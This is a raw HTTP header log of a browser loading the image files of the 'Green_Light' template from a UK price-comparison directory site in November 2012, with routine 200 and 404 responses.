User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/submit.php?su_categ=46
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 09:28:43 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 16 May 2009 20:08:44 GMT
Etag: &quot;a90043a-b4-46a0d20c8eb00&quot;
Accept-Ranges: bytes
Content-Length: 180
Connection: close
GET /template/Green_Light/img/images/copy-bg.gif HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/submit.php?su_categ=46
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Tue, 06 Nov 2012 09:28:43 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
Connection: close
Transfer-Encoding: chunked
GET /template/Green_Light/img/images/header-bg.gif HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/template/Green_Light/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 09:28:43 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 16 May 2009 20:08:51 GMT
Etag: &quot;a900425-230-46a0d2133bac0&quot;
Accept-Ranges: bytes
Content-Length: 560
Connection: close
GET /template/Green_Light/img/images/alpha-hover.gif HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/submit.php?su_categ=46
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 09:28:43 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 16 May 2009 20:08:42 GMT
Etag: &quot;a900432-39b-46a0d20aa6680&quot;
Accept-Ranges: bytes
Content-Length: 923
Connection: close
GET /template/Green_Light/img/images/search-button.gif HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/submit.php?su_categ=46
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 09:28:43 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 16 May 2009 20:08:56 GMT
Etag: &quot;a900469-451-46a0d21800600&quot;
Accept-Ranges: bytes
Content-Length: 1105
Connection: close
GET /template/Green_Light/img/images/box-bottom.gif HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/template/Green_Light/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 09:28:43 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 16 May 2009 20:08:45 GMT
Etag: &quot;a90043f-2b-46a0d20d82d40&quot;
Accept-Ranges: bytes
Content-Length: 43
Connection: close
GET /template/Green_Light/img/images/srch-box.gif HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/template/Green_Light/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 09:28:43 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 16 May 2009 20:08:57 GMT
Etag: &quot;a900416-a69-46a0d218f4840&quot;
Accept-Ranges: bytes
Content-Length: 2665
Connection: close
GET /template/Green_Light/img/images/cat-bl-hv.gif HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/submit.php?su_categ=46
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Tue, 06 Nov 2012 09:28:43 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
Connection: close
Transfer-Encoding: chunked
GET /template/Green_Light/img/images/box-top-left.gif HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/template/Green_Light/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 09:28:43 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 16 May 2009 20:08:45 GMT
Etag: &quot;a90041d-b5-46a0d20d82d40&quot;
Accept-Ranges: bytes
Content-Length: 181
Connection: close
GET /template/Green_Light/img/images/box-top-right.gif HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/template/Green_Light/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 09:28:43 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 16 May 2009 20:08:45 GMT
Etag: &quot;a90044a-b3-46a0d20d82d40&quot;
Accept-Ranges: bytes
Content-Length: 179
Connection: close
GET /template/Green_Light/img/images/box-top.gif HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/template/Green_Light/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 09:28:43 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 16 May 2009 20:08:45 GMT
Etag: &quot;a900443-2b-46a0d20d82d40&quot;
Accept-Ranges: bytes
Content-Length: 43
Connection: close
GET /template/Green_Light/img/images/box-border.gif HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/template/Green_Light/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 09:28:43 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 16 May 2009 20:08:44 GMT
Etag: &quot;a90044d-2b-46a0d20c8eb00&quot;
Accept-Ranges: bytes
Content-Length: 43
Connection: close
GET /template/Green_Light/img/images/cat-head-mid.gif HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/template/Green_Light/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 09:28:43 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 16 May 2009 20:08:47 GMT
Etag: &quot;a900436-b5-46a0d20f6b1c0&quot;
Accept-Ranges: bytes
Content-Length: 181
Connection: close
GET /template/Green_Light/img/images/box-bottom-left.gif HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/template/Green_Light/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 09:28:43 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 16 May 2009 20:08:44 GMT
Etag: &quot;a900422-b4-46a0d20c8eb00&quot;
Accept-Ranges: bytes
Content-Length: 180
Connection: close
GET /template/Green_Light/img/images/cat-head-right.gif HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/template/Green_Light/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 09:28:44 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 16 May 2009 20:08:47 GMT
Etag: &quot;a900452-2d3-46a0d20f6b1c0&quot;
Accept-Ranges: bytes
Content-Length: 723
Connection: close
GET /template/Green_Light/img/images/cat-head-lt.gif HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/template/Green_Light/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 09:28:44 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 16 May 2009 20:08:47 GMT
Etag: &quot;a90044f-281-46a0d20f6b1c0&quot;
Accept-Ranges: bytes
Content-Length: 641
Connection: close
GET /template/Green_Light/img/images/cat-bull.gif HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/template/Green_Light/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 09:28:44 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 16 May 2009 20:08:46 GMT
Etag: &quot;a900430-31-46a0d20e76f80&quot;
Accept-Ranges: bytes
Content-Length: 49
Connection: close
GET /template/Green_Light/img/images/lead-bot.gif HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/template/Green_Light/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 09:28:44 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 16 May 2009 20:08:52 GMT
Etag: &quot;a900437-25-46a0d2142fd00&quot;
Accept-Ranges: bytes
Content-Length: 37
Connection: close
GET /template/Green_Light/img/images/lead-top-left.gif HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/template/Green_Light/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 09:28:44 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 16 May 2009 20:08:52 GMT
Etag: &quot;a900456-be-46a0d2142fd00&quot;
Accept-Ranges: bytes
Content-Length: 190
Connection: close
GET /template/Green_Light/img/images/lead-top-right.gif HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/template/Green_Light/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 09:28:44 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 16 May 2009 20:08:52 GMT
Etag: &quot;a90043b-bb-46a0d2142fd00&quot;
Accept-Ranges: bytes
Content-Length: 187
Connection: close
GET /template/Green_Light/img/images/lead-top.gif HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/template/Green_Light/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 09:28:44 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 16 May 2009 20:08:53 GMT
Etag: &quot;a900468-2d-46a0d21523f40&quot;
Accept-Ranges: bytes
Content-Length: 45
Connection: close
GET /template/Green_Light/img/images/lead-side.gif HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/template/Green_Light/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 09:28:44 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 16 May 2009 20:08:52 GMT
Etag: &quot;a90046a-2b-46a0d2142fd00&quot;
Accept-Ranges: bytes
Content-Length: 43
Connection: close
GET /template/Green_Light/img/images/top-shape.png HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/template/Green_Light/style.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Tue, 06 Nov 2012 09:28:44 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 16 May 2009 20:08:59 GMT
Etag: &quot;a90041e-9bb-46a0d21adccc0&quot;
Accept-Ranges: bytes
Content-Length: 2491
Connection: close
GET /template/Green_Light/img/images/lead-bot-left.gif HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/template/Green_Light/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 09:28:44 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 16 May 2009 20:08:52 GMT
Etag: &quot;a900464-11f-46a0d2142fd00&quot;
Accept-Ranges: bytes
Content-Length: 287
Connection: close
GET /template/Green_Light/img/images/lead-bot-right.gif HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/template/Green_Light/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 09:28:44 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 16 May 2009 20:08:52 GMT
Etag: &quot;a900465-120-46a0d2142fd00&quot;
Accept-Ranges: bytes
Content-Length: 288
Connection: close
GET /template/Green_Light/img/images/h1.png HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/template/Green_Light/style.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Tue, 06 Nov 2012 09:28:44 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 16 May 2009 20:08:51 GMT
Etag: &quot;a900446-3f1-46a0d2133bac0&quot;
Accept-Ranges: bytes
Content-Length: 1009
Connection: close
GET /template/Green_Light/img/images/h1-shadow.gif HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/template/Green_Light/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 09:28:44 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 16 May 2009 20:08:51 GMT
Etag: &quot;a90042e-165-46a0d2133bac0&quot;
Accept-Ranges: bytes
Content-Length: 357
Connection: close
GET /template/Green_Light/img/images/top-menu-right.gif HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/template/Green_Light/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 09:28:44 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 16 May 2009 20:08:58 GMT
Etag: &quot;a90042f-17e-46a0d219e8a80&quot;
Accept-Ranges: bytes
Content-Length: 382
Connection: close
GET /template/Green_Light/img/images/top-menu-left.gif HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/template/Green_Light/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 09:28:44 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 16 May 2009 20:08:58 GMT
Etag: &quot;a90042d-24b-46a0d219e8a80&quot;
Accept-Ranges: bytes
Content-Length: 587
Connection: close
GET /template/Green_Light/img/images/top-menu.gif HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/template/Green_Light/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 09:28:44 GMT
